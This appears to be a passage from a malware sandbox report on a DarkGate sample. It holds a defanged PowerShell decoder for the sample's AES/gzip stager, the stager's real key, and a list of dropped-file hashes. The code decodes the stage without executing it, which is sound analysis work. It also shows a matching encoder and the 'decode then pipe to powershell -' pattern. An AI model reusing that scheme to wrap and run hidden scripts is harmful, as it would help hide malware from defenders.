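The stager run by PID 5084 is worth decoding offline rather than letting it reach `powershell -`. The PowerShell below is an added example, not the sample's code and not from the report: ConvertFrom-DarkGateStage repeats the stager's pipeline (Base64 → AES-256-ECB with zero padding, 16-byte prefix skipped → gzip → UTF-8) but returns the script as text instead of executing it. The key string RU1nU1ptd1B5dEJPQkRUQ2l6WFZUYXBjWWxNblJEZG4= is taken from the command line above (it Base64-decodes to the 32-byte ASCII key EMgSZmwPytBOBDTCizXVTapcYlMnRDdn); the encrypted blob is elided on this page, so New-StagePayload, the 16-byte junk prefix and the one-line next stage are constructed stand-ins that use the same scheme, and the function names are the example's own.

```powershell
# Added example, not part of the tria.ge report: defanged decoder for the AES/gzip stager
# seen in the command line of PID 5084. Returns the decoded script as text; nothing is run.
function ConvertFrom-DarkGateStage {
    param(
        [Parameter(Mandatory)][string]$Base64Payload,
        [Parameter(Mandatory)][string]$Base64Key
    )
    $blob = [Convert]::FromBase64String($Base64Payload)
    $aes = New-Object System.Security.Cryptography.AesManaged
    $aes.Mode      = [System.Security.Cryptography.CipherMode]::ECB
    $aes.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
    $aes.BlockSize = 128
    $aes.KeySize   = 256
    $aes.Key       = [Convert]::FromBase64String($Base64Key)
    # The stager copies the first 16 bytes into $aes.IV, but ECB never uses an IV: the prefix
    # is simply skipped by the offset of 16 below and contributes nothing to the decryption.
    $aes.IV = [byte[]]$blob[0..15]
    $decryptor = $aes.CreateDecryptor()
    $plain = $decryptor.TransformFinalBlock($blob, 16, $blob.Length - 16)
    $aes.Dispose()

    $in  = New-Object System.IO.MemoryStream -ArgumentList (,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GzipStream -ArgumentList $in, ([System.IO.Compression.CompressionMode]::Decompress)
    try {
        $gz.CopyTo($out)
    } catch {
        # PaddingMode.Zeros leaves NUL bytes after the gzip trailer. Windows PowerShell 5.1,
        # the runtime the sample ran under, ignores them; newer .NET runtimes may reject them
        # as a corrupt second gzip member after the first one has already been written to $out.
        if ($out.Length -eq 0) { throw }
    }
    $gz.Close(); $in.Close()
    return [System.Text.Encoding]::UTF8.GetString($out.ToArray())
}

function New-StagePayload {
    # Constructed counterpart used only to produce test input: gzip, then AES-256-ECB with zero
    # padding, 16 junk bytes prepended, Base64 encoded, i.e. the layout the stager expects.
    param([Parameter(Mandatory)][string]$Script, [Parameter(Mandatory)][string]$Base64Key)
    $ms  = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GzipStream -ArgumentList $ms, ([System.IO.Compression.CompressionMode]::Compress)
    $raw = [System.Text.Encoding]::UTF8.GetBytes($Script)
    $gz.Write($raw, 0, $raw.Length); $gz.Close()
    $compressed = $ms.ToArray()          # ToArray still works after the stream is closed

    $aes = New-Object System.Security.Cryptography.AesManaged
    $aes.Mode = 'ECB'; $aes.Padding = 'Zeros'; $aes.KeySize = 256
    $aes.Key = [Convert]::FromBase64String($Base64Key)
    $cipher = $aes.CreateEncryptor().TransformFinalBlock($compressed, 0, $compressed.Length)
    $aes.Dispose()

    $prefix = [byte[]](1..16)            # constructed junk prefix; the real sample's bytes are unknown
    return [Convert]::ToBase64String([byte[]]($prefix + $cipher))
}

$key       = 'RU1nU1ptd1B5dEJPQkRUQ2l6WFZUYXBjWWxNblJEZG4='   # key string from the report
$nextStage = "Write-Output 'constructed next stage'"          # constructed stand-in for the real second stage
$blob      = New-StagePayload -Script $nextStage -Base64Key $key
$decoded   = ConvertFrom-DarkGateStage -Base64Payload $blob -Base64Key $key
if ($decoded -ne $nextStage) { throw 'round trip failed' }
$decoded
```

To decode the real stage, pass the blob from the command line of PID 5084 as -Base64Payload with the same key. Two things the command line itself shows: the mode is ECB, so the "IV" the stager assigns is decoration and the key alone recovers the script; and the trailing `| powershell -` is the only part that executes anything, which is why this version stops at returning the text and why the process tree shows a second powershell.exe (3744) started with just `-` as its argument.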
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: 5889649fbb862b6b6a9a0b56fbf61be4
SHA1: 4dccc89f5111aeb64987e1da69cd950fe5458d2d
SHA256: 4e6e72bf47c98b9f78428ed5a1fed3dac7d1d781c5ae39bb2460b2064ad1df03
SHA512: 0b201d6df48e963923bff2f011e3a9986c70fc28a6525d1880b64216a9ac0a7be7b07ead5e730e03f360b75dad30e27944cc35f8c2100682fabfd4a339086933

Filesize: 475KB
MD5: c3ad99769dd08a8bef87f9e3558e9b70
SHA1: bbe29d7ac320ec73b2f05482402d8e6824ce8c0a
SHA256: 1316cffb55a8e5284d927b683be1ccd72c696ad28e5bc0aa9eb8d915e1dc8065
SHA512: dc14821126838fa0e6cc0fc5f95d79e63a0aaa2a8d3cdf3412adefd316d0daf293f99383b5227973c7a4f8127a7aa215c001b217a6393337753dae11b0a2cb5e

Filesize: 36KB
MD5: b30d3becc8731792523d599d949e63f5
SHA1: 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256: b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512: 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Filesize: 56KB
MD5: 752a1f26b18748311b691c7d8fc20633
SHA1: c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256: 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512: a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Filesize: 64KB
MD5: 14531fe00eae6edd349cc3ef0895282d
SHA1: 84a3517de9e048861c60a0744115104321d7585c
SHA256: d814f98e636d2ea8c941571b866ea5f7a2d53c40f3a29fec234b010a6c12ff71
SHA512: 1684a52d32609e516d014122b5ada9eca150d6d5778dd0125b97a659c6c0164a42ae053f6b37678dfdd35e7674e36489ff9bfa5849b0c7f77140b1fd416cd5d2

Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize: 64B
MD5: a6c9d692ed2826ecb12c09356e69cc09
SHA1: def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256: a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512: 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 872KB
MD5: c56b5f0201a3b3de53e561fe76912bfd
SHA1: 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512: 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Filesize: 32B
MD5: b0d2f31411dcbec024ec3bb3c3dcb059
SHA1: 52a1a43dfb6c03bacf171b6925ffc151caa53d9e
SHA256: f455c19938e0374d392875fcd951c66f70b4c4dfa0657af99888f9251fdac26c
SHA512: bb9a7ff6428334ad36add4878baadda7f824534ea953d67bdd20d02463bb98bf1fa36dbdac3a04ffce42f998c1b4dc01118c40e40e87bc5948cfca928795d272

Filesize: 53KB
MD5: 6bb492c383240fcd87b5c42958c2e482
SHA1: be75995fb0de7529ee5049696dfb519434385ab7
SHA256: 4c76b7a367c810aa717ec49caf5bd8ee3edeefd197241f6bd3698ed5de2c4ddc
SHA512: dfafb4cae44be342c440d95342e1f3e65644b45ea375f3590f836347dd4e08727ec71118454104c150f4c5dea7887373cc53a20a781d428a308ee7237f9cd903

Filesize: 468KB
MD5: 09c72552b42b0fae2552c41acfbb7cf2
SHA1: 6669f042ebb9db63e17e153fc8995b0590805f2c
SHA256: 0bb0d54ffd2039653da143e12d566018e54309dddef9f6606d2d7484d27e65f0
SHA512: 6f0d47e8d329b8da0f99f50f2e602eb79a5f18bb9ba619223df821c17e329651b56673fe1bf5b5af0ffe199e36cd4e6b39f244fe3b63ae09c314226777ce529c

Filesize: 76B
MD5: 23e148a3d47b55033e9cca832d3f9725
SHA1: c973359fbdd34453f527b13780da41986e78b768
SHA256: 9fb6cfff8eaaa0acac13a86f6626a9f9034ba7063daf33c4acb1d692dcbd70f4
SHA512: 269368c92495a0b54b84eabbd216fac2db9c07f8ea445d68bbf2210ef76c0cedfff8ff892e3e00495122bfb455abbf18a25bfbc0dc34910f98c2320cc3e0d754

Filesize: 4B
MD5: 329d0a4bec0b0ad51eb2176e94af1565
SHA1: c3838da2a0e9f5229b3f96603dd440416c203d0a
SHA256: bf25aef858bb88e9c68c72fb34d23752de554fa990435d521f867465901996aa
SHA512: 90c9bf7f1b5cfe31cca6426b87b47000200d82dbd50150af69e489b08f45c9e7110260892028ecc6aabc433eb67b6fdb5a02e0f8f90ab9e17b4dc954efc4c6ae

Filesize: 4B
MD5: be16876ad1b37a2a36d258b057ac3412
SHA1: 0183c008dbfcf123a9cb2b147164b8ca1a30573b
SHA256: e4c8c98e55830b04ecb40118dea1fc8033f87640be5cc69c7f8b3d7e218d30aa
SHA512: 53a2fb8a4a0e7015df775c11e03301c2b2b98cac6f069f70b2c958a2d396a67ee926694e12679c21ac2c3a701e013eaf90c05bf776920d4569d0aaa6a90d3c28

Filesize: 4B
MD5: 576dde89a30d15b38af6c91a3fdd8df2
SHA1: ff881ca577efedb8c39234a1aca56a2a39272da5
SHA256: 1c16731b636e4342672917cb4989e787702eec50d560aea9a063eb22d5eb899d
SHA512: 29a79139b570d88c0f55a741705f05f68c043252406275300c787352c57005ebbe5f4f52bfa659ff2d88e7646a87ea14130b818bac3d156133c761d35e729f12